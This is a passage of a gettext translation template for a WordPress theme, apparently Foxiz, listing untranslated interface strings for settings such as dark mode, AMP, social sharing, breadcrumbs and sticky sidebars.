backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: 